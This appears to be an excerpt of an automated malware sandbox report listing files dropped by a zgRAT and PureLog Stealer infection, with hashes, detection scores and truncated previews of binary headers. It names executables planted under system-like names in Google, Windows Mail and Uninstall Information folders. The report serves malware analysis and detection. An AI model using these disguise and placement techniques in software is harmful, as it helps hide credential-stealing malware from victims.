Preview:	Q6Hg7uViRqB5zIOV0OJfpWtZUCZH25LeXYSbQTBaeMjN9YM7AeSjJXR4NrL4VNqVfhia0wFhNtAcwfa60cGYnlV9HYOjHGEQgNrc0vGNYuWZWyHrQPE3GRs4MiTcigaGpu6jx7FEV393O5nSQgS1CLJOfxPSbop2TPum2i4TKAhNRzpQ4BLCOiEdkrDArwmrNHj9LBZsm9rCn56qI9XacnovKQBKe3lXX0AKPpE3ldZO1CzouX2sYMOjcyy5AONsXTox5wac4ey8NZ3HaWaGB38Llarb0J3XPr1hYCt86ax4XPVD4qenyGreUcLeE9lvkbtgiWtYmcKkFEyVEohJpPiI9WM60O37zBT6gzei7FAW6GZQozZZcbGU2kgMJxhYiMvDu1zPJ8MjOML376RAydfX59E5SSZKimxuUVgwAKPdOgFpYnPNfgjEqYIvx361jCBmZbilZfAoOCJZ3YhpDMoBCsD6Nv9HOY4MfdQ7EnxAg50oPs1YWQyXXAjqXmYof2azI63ZIjlaYoeH2Zre3kv7jgzf4jkbOIeofAgSzbQwpY8sfby754u5GdPlHYfi8JLPK0m13YpbU8RLiG9cvmgUYjhCu4La5syfMsipz6EgPSlILEDBZDwVn11lSjG8NOglKv9zhUmzi9FF7Z0q1KB15c2V07WPzGTAw97ZFOdEb7xovwn3taGDMoqr3n8k7W9cqES8balnq6a8pNjEUdgZ9PxITQgbP3HF7V8reobSydWQNrBpD4PezjcaQJpL4JXxzUAUP2jpBOlg2h4lO0YVnnQX2hbV9QXoFjb3qrZLUkck86htOD6EvCJMEncraOqv16aTGB4haMADKpZ5AsG5TT3CZPyDPsuG3rtCfNmNIZnjCGBYNgrsHubiCY40M1Rsb3Jc6WZxF3x3qU9TNaztBC9JQK9HTwARH4HJ6jb1G4nO7h1sYlnwBirZ49MvWS

C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\dasHost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92% Antivirus: Virustotal, Detection: 58%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Mail\RKjtGQcyio.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92% Antivirus: Virustotal, Detection: 58%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Program Files (x86)\Windows Mail\fdacde7dce6975

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	180
Entropy (8bit):	5.689397478284489
Encrypted:	false
SSDEEP:	3:Uk3LEd6JCRwhoyBQ7SsPgVEcc2iDRsCLOr0MXfRh8HQUNtkGqkEhRicZdxF6n:j3RJC+EbQW2iDKCLEBq7tkZkIRiS6n
MD5:	DA6322BAB926B0BA5786849D5491104B
SHA1:	5766624028A950879324AD9687FF6C2294D4B52E
SHA-256:	3E1C9C6844BFED0214D35E868F08E09857F0CE9615245D6D782F4884022B4CCC
SHA-512:	4F1A6C24D78AF023D58298CD657A497700A6BBE4F16D0C4FFEA166A6426F31FC07A841DBCC3D6605DFE2D718A9C3B172FDE1A220A118D1621A9D283B2E0ADBA4
Malicious:	false
Reputation:	unknown
Preview:	p0extw2xv15Rn0WVlv3DLMj2obAxjoge7ElgEN74UedMsJP4qduzv89cQlIRwFOGVbUiP0QXy9srtXJfMFGF4rs9FIPdEqIPQX0Ryqo0NWBvPSt2cmEq8IMosVcHkxSH1daWg2rfbQ1hp7txZWAcmbRHKMjdOhPaD44v1XWj5iPrQo8vlpsN

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\ProgramData\setup.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
SHA1:	53C870D62DCD6154052445DC03888CDC6CFFD370
SHA-256:	BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
SHA-512:	A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 79%, Browse
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......\|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................

C:\Program Files\Uninstall Information\cmd.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3720704
Entropy (8bit):	7.733352681119499
Encrypted:	false
SSDEEP:	98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
MD5:	5FE249BBCC644C6F155D86E8B3CC1E12
SHA1:	F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
SHA-256:	9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
SHA-512:	B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Uninstall Information\cmd.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Uninstall Information\cmd.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92% Antivirus: Virustotal, Detection: 58%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...

C:\Program Files\Uninstall Information\ebf1f9fa8afd6d

Download File

Process:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	5.143983303761562
Encrypted:	false
SSDEEP:	3:Sih2d1nwonzUBEU5Hr+/mN91u:Sih2d1HU5Hy+Nm
MD5:	65142D043E011D6C49A3A6E96AE22E05
SHA1:	F7375B600A1CE911AF2FD087E062FFBBCAC1D70B
SHA-256:	A5080E38CC0AFFD116877A42EC02831AABAEBCE050CB33E93ECCF018D78C0A22
SHA-512:	9998B8602A77C005F82EE981FBB0FFCF8AECC7FEB4FAC043013FF41E1E1D54B029898AA5BEBB2B05AAA5515DDF9C71EE8E40D8E3C6EFD8FAF45353B2A2EBC4BB
Malicious:	false
Reputation:	unknown
Preview:	86BAbgDMj1fOx1izBoNZejiMCQrRVqzLMrntqNUUbNmbpFfWsE9xQWjYXz8K

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RuntimeBroker2.0_68d4af28c8e838a8eb88c4f4b6692977aa97bdf_29d50771_92cf3a5f-d995-4a06-93e6-c7de09f7b794\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1747061550666387
Encrypted:	false
SSDEEP:	192:sRuew4l+k5P08rLVsaWgdl/N6fmzuiFcZ24lO8v:euew40ki8rLVsar/gfmzuiFcY4lO8v
MD5:	7DA67E995282A76FC8922AEAC706614A
SHA1:	FDD1B452FE6EB500A59248836EA311ADE58986C3
SHA-256:	DF17B9824DFEC6828BE84D63B1F7B2D9A601D2BB4531070C1796ADA995BE8C16
SHA-512:	F85EB6DF6A09B5DC163E4CA8D432004D7CFD73BFD67FDB4280854312B213EE32E0B360719C66A89A0F6FB73AAAE528B2AA0C3B46E32A7D356F5F9F65ABCE76A9
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.9.7.6.2.3.0.7.9.0.3.4.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.9.7.6.2.3.1.8.5.2.8.5.1.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.c.f.3.a.5.f.-.d.9.9.5.-.4.a.0.6.-.9.3.e.6.-.c.7.d.e.0.9.f.7.b.7.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.9.3.0.8.8.d.-.a.3.3.9.-.4.5.5.a.-.a.3.9.a.-.f.1.b.4.2.c.5.6.8.7.5.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.R.u.n.t.i.m.e.B.r.o.k.e.r.2...0...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.n.t.i.m.e.B.r.o.k.e.r.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.0.8.-.0.0.0.1.-.0.0.1.4.-.4.1.f.2.-.3.e.c.a.f.0.e.3.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.f.b.8.1.d.f.2.1.9.9.2.2.d.c.9.7.e.2.2.d.5.c.7.b.d.1.d.b.d.d.c.0.0.0.0.0.0.0.0.!.0.0.0.0.d.3.5.9.a.b.c.0.e.b.b.9.8.7.7.c.9.1.7.e.1.2.5.f.b.4.e.2.8.c.2.4.b.2.7.6.9.6.a.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE278.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Aug 1 08:57:11 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	546105
Entropy (8bit):	2.917742919736517
Encrypted:	false
SSDEEP:	3072:m+Nj6PFC4LBoVmfyBOXpIymdSZQy+/yhSZ7+4awRZcSVWvbQ1CCq5wWRTA3+vPt0:moO3MyhSZiAc6q5w0TA3Qmo
MD5:	21F2A4926DD0995C93B239C52B03F524
SHA1:	DC5ABC434FC6D8F1E68470C6056C677791519954
SHA-256:	740AF3A9A2C9F7DDFF88045C5D659A82800C26A14F7154E13414E7F780B971DB
SHA-512:	53859A4FD3179EC97AE629F5E6B7ED424E1E8788AA8A3DC1FD93AD2D02BA58F93186D892DDBA28DBF33EB771E8E0EC5761BBE130346652353C7323DED3E60E82
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... ........M.f....................................<....(...........)......t?..............l.......8...........T...........8Z..............$4...........6..............................................................................eJ.......6......Lw......................T............M.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE548.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8816
Entropy (8bit):	3.700786015847611
Encrypted:	false
SSDEEP:	192:R6l7wVeJ9Ob6YvncVFWgmfZeEDEprF89bFxkfg3m:R6lXJ0b6YvcmgmfnDDFCfN
MD5:	7A82AAFDA6A595A9EE1EDEE88912D4B8
SHA1:	B25DBB18D6BF541600B9F8620B7CD78EA09448F0
SHA-256:	B1664ED55BCDF5E9638F9459EF11628176BF680F869B59F1291DCA39F3271E50
SHA-512:	9B030010038F4B96D7BCBA0DD1A8FFEC18C768D7B23ABB3F03F1BB12B67861DFFF1E3FBED362235574BCA897A4AB7467036C8E1FB2209298BF6B3369DD0170C2
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE578.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4843
Entropy (8bit):	4.480785349702387
Encrypted:	false
SSDEEP:	96:uIjfAI7Qd7VIJXS1FWl1CyfEVc3AcyTXd:uIkYQd76XS1E1rwc3AcGt
MD5:	748D591357981048AB19F49EC96DFE42
SHA1:	502BE84B86C4E3F5DD6EC9E48E14AD3AB38D1146
SHA-256:	1A118AD6839FCFE84CB34DDC11DD1CDF67E9BCCD24F4E4E2389B98162A8C3B79
SHA-512:	D61CBD17B8B867C9A2D4CED3C63916C52FA210B0E5B9BC801ACB706B6F2CCDE2BE880639A5DF63DA43FC18EA8493582604FF8A50B26184C1AE1252D5BF6D5C35
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="436319" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE586.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	81646
Entropy (8bit):	3.023750456609559
Encrypted:	false
SSDEEP:	768:2eV09TSv7Y4KJiAT8q8D/Y1RyPzIk1oZ+G6RPIzx990HicqnOc/G:2eusv7Y4KJNr8c7EUcoQ1Idf8icqOc/G
MD5:	2E03841FFC9DBB645B145AE30623EF5D
SHA1:	FB877370C1FCCEA3DDBD5658A06706C00B9E8CBB
SHA-256:	470D682D28971097A4EA0C5E756B584A6D9DEC90DD04390F64090C475E1C19B0
SHA-512:	8D5394296B78AFBD9C0C8BCD790B7DE1B64431E706F208BF17EBF796A53BEF9F80EAE429934D4C850ED44F8E8B880E201B2FBD75083BAB37C9B1A90D53295891
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE652.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685129210354656
Encrypted:	false
SSDEEP:	96:TiZYWD3l0C5oUoMYDYnWn8HSUYEZ4StEix4CyawuH2bRaK3yM684Ivc3:2ZDTEM0NQWVaK3yM68fvc3
MD5:	31332DB8CE56D85914A63C812AB13DB4
SHA1:	4FD7CE3CC41EFE99593AC2E74987E302E643FE28
SHA-256:	22F7DB04FF6AFB89B644D40FD8FED5B771EC213DFDD78CE31DB04714D94F8F4A
SHA-512:	CDC7B459EFF9440680EB649826998D83D147BB4544756628A8145B3096BECB34E5822703475AA74F1F3C88C31113AC47ADAA59A1A7784D3AFB6A471F7DA830B0
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\based.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6171507
Entropy (8bit):	7.989540814911256
Encrypted:	false
SSDEEP:	98304:CimoDUN43WlaEBjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6aunM6y:CiumWf9OjmFwDRxtYSHdK34kdai7bN3G
MD5:	10D45FBCAC1C3CCF126754680E91E0E2
SHA1:	4FA6B7803EEEDC7E67B93754E6ABDC55F1E6D1A1
SHA-256:	E850A4C7A5F7D933FB70A9E8AA138C2B777390AFCCDCE6F9C4514046C931C8BE
SHA-512:	270DD0B62E00C280EA60D399E1A9BB8DA10D35BE16797564A67F169B83042754DDFCF5E05B27AE75404C077329FE194800563A2BFBCC1011A5F91E609867521E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 51% Antivirus: Virustotal, Detection: 47%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d....8.f.........."....(.....l.................@....................................N.]...`.................................................l...x.......T....`..."....]..<......h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...T...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\hacn.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11662615
Entropy (8bit):	7.996772653002528
Encrypted:	true
SSDEEP:	196608:QCUDfyGowBdnpkYRMZqsrMELkmHe/tQK3j3fxIyAN7z7FUqVYwD7XmL:QDfDoc6Y6/km6GyxgN7zZFVr7X
MD5:	FC445049713C02F9A9DDAA62E404C9E9
SHA1:	8BCFA380451D9B71B4933E28C9FFB6710D12323E
SHA-256:	B39448F8013728D904A44A3FA4C510539D3FDD2AA35A1355D49E0343852A8556
SHA-512:	14C81AAD762CA16024A35799783F22D244FB88BCC350BEAC27E00CC54B36E822E5FDDDC7CAE414A8A08ED93E2BB93F765C4D2CB3869D552003F9F80B4AD869C4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 62%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....+.f.........."....%.....p.................@....................................b%....`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................

C:\ProgramData\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI76842\s.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	7.71585644239634
Encrypted:	false
SSDEEP:	98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
MD5:	1274CBCD6329098F79A3BE6D76AB8B97
